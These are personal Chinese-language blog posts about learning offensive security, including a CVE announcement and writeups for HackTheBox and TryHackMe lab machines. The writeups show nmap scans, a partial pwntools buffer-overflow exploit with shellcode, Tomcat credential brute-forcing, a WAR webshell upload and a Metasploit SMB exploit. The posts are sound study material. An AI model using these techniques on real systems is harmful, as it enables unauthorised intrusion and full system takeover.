Wenyi Li

這個月社團請到frozenkp講課,最近就一直在練PWN。 這題是Angelboy之前在台大計安上課用的題目。有錄影片在youtube上。 主要是32 bit ROP ,不曉得現在比賽還見不見得到? 攻擊步驟: 1.找塊rw的記憶體寫入 "/bin/sh\x00" 2.設好register值,去做execve的syscall 好想睡覺...

CVE-2022-48113    2/3 六點多起床，準備出門參加臺灣好厲駭的培訓。手機拿起來，看到 MITRE 的來信。我的漏洞被分配 CVE 編號並公開了!! 爽爆。 第一次的 CVE 就這樣獻給 TOTOLINK。是個 wifi 分享器 RCE 漏洞。 這其實不是我第一個 0day，之前有回報其他漏洞，但過了好幾個月都沒下文。 自從去年參加 AIS3 和 HITCON 就很想挖 0day。覺得很酷，很屌，很厲害。 這是我學習駭客技術之旅的重大里程碑，非常有成就感。不過研究過程中忽略了生活其它重要的事，經歷了出乎意料的挫折與打擊。 感謝身邊的朋友陪我度過這段低潮期。 希望未來能達成良好的平衡，保持身心健康與研究的熱情。

嘖嘖嘖...試著用cherrytree寫writeup，超煩。 還是比較喜歡hackmd 這台的思路跟我去年打下第一台現實世界的伺服器是差不多的。 提權的部分學到新招:metasploit local exploit suggester! 雖然目前一直用metasploit打起來很爽，但之後考OSCP禁用。 HackTheBox Devel writeup - HackMD HackTheBox Devel writeup HackTheBox Devel writeup Port Scan ┌──(kali㉿kali)-[~/Devel] └─$ nmap 10.10.10.5 -T4 -A -o nmao.txt Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-18 23:02 EST Nmap scan report for 10.10.10.5 Host is up (0.27s latency). Not shown: 998 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-syst: |_ SYST: Windows_NT | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 03-18-17 01:06AM <DIR> aspnet_client | 03-17-17 04:37PM 689 iisstart.htm |_03-17-17 04:37PM 184946 welcome.png 80/tcp open http

TryHackMe GateKeeper - HackMD 其實這篇去年6/28寫的，想說從hackmd移到blogger TryHackMe GateKeeper 這間主要練OSCP會出現的 windows bufferoverflow。提權部分就沒打了 情蒐 port scan 檢查服務 發現port 135,139,31337是開的。 port 31337 跑的就是我們要pwn的程式。 smbclient連過去挖一下，找到 gatekeeper.exe，把它載下來，移到windows平台測試 fuzzing：想辦法讓程式掛掉 將 gatekeeper.exe 丟進Immunity Debugger後，自己寫腳本fuzz。 finding badchars with mona !mona ba 用pwntools送bytearray 最後 exploit from pwn import * RHOST = "10.10.101.108" r = remote(RHOST, 31337 ) shellcode = ( b"\xbb\xc1\x54\x15\x16\xdb\xdb\xd9\x74\x24\xf4\x5a\x29\xc9\xb1" b"\x52\x31\x5a\x12\x03\x5a\x12\x83\x2b\xa8\xf7\xe3\x57\xb9\x7a" b"\x0b\xa7\x3a\x1b\x85\x42\x0b\x1b\xf1\x07\x3c\xab\x71\x45\xb1" b"\x40\xd7\x7d\x42\x24\xf0\x72\xe3\x83\x26\xbd\xf4\xb8\x1b\xdc" b"\x76\xc3\x4f\x3e\x46\x0c\x82\x3f\x8f\x71\x6f\x6d\x58

又是台windows靶機，這次是打 Apache tomcat nmap 照慣例用nmap掃，發現只開一個8080 port 如果沒找到東西還會再掃所有port  目錄爆破 拿dirb掃，然後沒有找到任何有用的東西 Research and Enumeration 知道這台機器跑 Apache Tomcat 7.0.88 跟 Apache Coyote 1.1 上網查有沒有公開漏洞 Exploit DB 沒找到什麼可以用的RCE 但看了一下hacktricks ( https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/tomcat ) 發現有辦法登入Tomcat 的管理介面，就能透過上傳WAR檔放個webshell 管理者帳密爆破 tomcat 使用HTTP basic auth 有個metasploit模組可以用來爆破: 讓它跑一下，就成功猜到帳密了 RCE 登入管理介面後，就能傳webshell達成RCE。 這邊我懶一點，繼續用 metasploit 然後就拿到shell了~  開 shell 馬上就是最高權限 

 第2台靶機。這台是Windows。 先nmap 發現135,139,445開著，用 -A做完整掃描(包括version detection, script scan等等) 吐一堆資訊出來，我們知道它是Windows XP,可能SP2或SP3。 根據這些資訊查公開漏洞。馬上找到一個:CVE-2008-4250 這是個針對smb的bufferoverflow，算蠻穩的exploit。 使用對應的metasploit模組: 設定參數並執行，然後就開shell了 我們還是系統最高權限。 Takeaway:之後檢查smb可以用這nmap script: nmap -p 445 -script smb-check-vulns -script-args=unsafe=1 <IP Address>